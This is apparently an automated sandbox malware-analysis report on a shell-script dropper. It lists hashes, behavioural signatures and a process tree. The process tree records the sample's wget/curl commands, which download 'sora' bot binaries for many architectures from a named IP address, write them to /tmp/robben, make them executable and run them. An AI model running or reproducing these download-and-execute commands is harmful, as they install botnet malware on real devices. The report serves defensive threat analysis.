Analysis

max time kernel: 28s
max time network: 29s
platform: debian-9_mipsel
resource: debian9-mipsel-20240729-en
resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 02:04
Static task: static1

Behavioral task: behavioral1
  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  Resource: debian9-armhf-20240729-en

Behavioral task: behavioral3
  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  Resource: debian9-mipsel-20240729-en
General

Target: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Size: 2KB
MD5: 5d873bf46fd4ff411eb17e42d5ae2980
SHA1: fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
SHA256: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
SHA512: f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  776   chmod
  804   chmod
  836   chmod
  881   chmod
  794   chmod
  820   chmod
  855   chmod
  869   chmod
  875   chmod
  923   chmod
  765   chmod
  788   chmod
  782   chmod
  911   chmod

Executes dropped EXE (14 IoCs)
  ioc           pid   Process
  /tmp/robben   766   robben
  /tmp/robben   777   robben
  /tmp/robben   783   robben
  /tmp/robben   789   robben
  /tmp/robben   795   robben
  /tmp/robben   805   robben
  /tmp/robben   821   robben
  /tmp/robben   837   robben
  /tmp/robben   857   robben
  /tmp/robben   870   robben
  /tmp/robben   876   robben
  /tmp/robben   882   robben
  /tmp/robben   912   robben
  /tmp/robben   924   robben
Reads runtime system information (14 IoCs)
  description               ioc                             Process
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid   Process
  769   wget
  772   curl
  775   cat

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description                    ioc           Process
  File opened for modification   /tmp/robben   7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes

PID 740   /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
          command: /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
          signatures: Writes file to tmp directory

  PID 743   /usr/bin/wget   wget http://93.123.85.141/bins/sora.x86
  PID 753   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.x86
            signatures: Reads runtime system information
  PID 763   /bin/cat        cat sora.x86
  PID 765   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 766   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 769   /usr/bin/wget   wget http://93.123.85.141/bins/sora.mips
            signatures: System Network Configuration Discovery
  PID 772   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.mips
            signatures: Reads runtime system information; System Network Configuration Discovery
  PID 775   /bin/cat        cat sora.mips
            signatures: System Network Configuration Discovery
  PID 776   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 777   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 779   /usr/bin/wget   wget http://93.123.85.141/bins/sora.x86_64
  PID 780   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.x86_64
            signatures: Reads runtime system information
  PID 781   /bin/cat        cat sora.x86_64
  PID 782   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 783   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 785   /usr/bin/wget   wget http://93.123.85.141/bins/sora.i468
  PID 786   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.i468
            signatures: Reads runtime system information
  PID 787   /bin/cat        cat sora.i468
  PID 788   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 789   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 791   /usr/bin/wget   wget http://93.123.85.141/bins/sora.i686
  PID 792   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.i686
            signatures: Reads runtime system information
  PID 793   /bin/cat        cat sora.i686
  PID 794   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 795   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 797   /usr/bin/wget   wget http://93.123.85.141/bins/sora.mpsl
  PID 798   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.mpsl
            signatures: Reads runtime system information
  PID 802   /bin/cat        cat sora.mpsl
  PID 804   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 805   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 807   /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm4
  PID 811   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm4
            signatures: Reads runtime system information
  PID 818   /bin/cat        cat sora.arm4
  PID 820   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 821   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 824   /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm5
  PID 828   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm5
            signatures: Reads runtime system information
  PID 833   /bin/cat        cat sora.arm5
  PID 836   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 837   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 839   /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm6
  PID 843   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm6
            signatures: Reads runtime system information
  PID 852   /bin/cat        cat sora.arm6
  PID 855   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 857   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 859   /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm7
  PID 863   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm7
            signatures: Reads runtime system information
  PID 868   /bin/cat        cat sora.arm7
  PID 869   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 870   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 872   /usr/bin/wget   wget http://93.123.85.141/bins/sora.ppc
  PID 873   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.ppc
            signatures: Reads runtime system information
  PID 874   /bin/cat        cat sora.ppc
  PID 875   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 876   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 878   /usr/bin/wget   wget http://93.123.85.141/bins/sora.ppc440fp
  PID 879   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.ppc440fp
            signatures: Reads runtime system information
  PID 880   /bin/cat        cat sora.ppc440fp
  PID 881   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 882   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 884   /usr/bin/wget   wget http://93.123.85.141/bins/sora.m68k
  PID 901   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.m68k
            signatures: Reads runtime system information
  PID 909   /bin/cat        cat sora.m68k
  PID 911   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 912   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE

  PID 914   /usr/bin/wget   wget http://93.123.85.141/bins/sora.sh4
  PID 918   /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.sh4
            signatures: Reads runtime system information
  PID 922   /bin/cat        cat sora.sh4
  PID 923   /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd
            signatures: File and Directory Permissions Modification
  PID 924   /tmp/robben     ./robben Payload
            signatures: Executes dropped EXE